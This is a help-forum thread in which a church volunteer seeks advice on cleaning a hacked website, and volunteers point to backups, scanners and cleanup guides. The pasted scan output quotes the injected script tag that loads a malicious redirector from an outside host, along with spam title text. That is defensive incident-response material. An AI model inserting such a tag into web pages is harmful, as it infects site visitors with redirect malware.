Church website hacked.

[REDACTED]

Hi.  I've just inherited a hacked website for our church and am attempting to repair it with little experience!  I do repair computers and have a working knowledge of editing and uploading info to a website, but need some direction.  Macbook Pro 10.9.5, Sandvox 2.1, Transit FTP.
We were using File Zilla when the hack occurred.
The person who built the site and maintained it for several years clicked on a Adobe Flash Update fake link and that started the problems.
I scanned for Malware and Virus with Sophos, Webroot after this happened but we still had intermittent issues on selected computers in the office and from church members at home.
I alerted Cox Communications 5/9/15 and they verified the hack and shut our site down.  They said the hack was using our site to sell counterfeit items and drugs.
Now I'm supposed to clean our website files of the hacks before they can put us back on the web.
I used Sucuri and it yielded the included results.  I am uncertain what steps to take with my limited experience with this type of problem.  Suggestions welcome. (I've used Avast for years on home computers.)

Website:
risen-savior.org
Status:
Infected With Malware. Immediate Action is Required.
Web Trust:
Not Currently Blacklisted (10 Blacklists Checked)
Scan
Result
Severity
Recommendation
Malware
Detected
Critical
Get Your Site Cleaned
ISSUE DETECTED
DEFINITION
INFECTED URL
Website Malware
8malware-entry-mwanomalysp
http://risen-savior.org ( View Payload )
Website Malware
malware-entry-mwanomalysp8
http://risen-savior.org/about/calendar-google.html ( View Payload )
SEO Spam
MW:SPAM:SEO?v011
http://risen-savior.org ( View Payload )
Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script src="http://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>

Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script src="http://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>

Known Spam detected. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?v011
<title>Cheap Air Jordan 11 Hoyas For Sale,Retro Low Georgetown Hoyas 11s Full Size</title>

[Eddy]

Place a non infected backup back.

[polonus]

See fail and warnings: https://asafaweb.com/Scan?Url=risen-savior.org

Take a scan here: https://hackertarget.com/wordpress-security-scan/

Disable or delete all plugins and switch to the default theme
Might be down to the following malicious javascript which appears before the DTD

<script src="htxp://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>
Avast detects as HTML:RedirBA-inf [Trj]

The good news is that you can fix it. Read through these articles and you should have your site back.

http://codex.wordpress.org/FAQ_My_site_was_hacked
https://wordpress.org/support/topic/exploits-and-godaddy?replies=28#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

polonus (volunteer website security analyst and website error-hunter)

[REDACTED]

Thank you so much, I'm on it and will report back.

[Pondus]

F-Secure and Norman/BlueCoat have added site to detection

===========================================================================================================
The file you sent was found to be malicious. We will be detecting the sample you submitted as Trojan.JS.Redirector.BRQ in the next database update.
===========================================================================================================
Detections have been added for malicious sample and urls. risen-savior.org.htm  MalScript.N
===========================================================================================================

[REDACTED]

Well, I had an old copy of the website and gave to Cox for an upload and they accepted it.  I have to update the content but it meant I didn't get to experiment with your great suggestions.  I'm saving them though, you betcha!  Also looking for another host that keeps back-up copies to prevent this pain in the arse!  Thanks again to all!

[Eddy]

Perhaps you find something useful in these search results:
http://tinyurl.com/os9h9l2

If the site is using (My)SQL, make sure a backup tool/site is supporting it.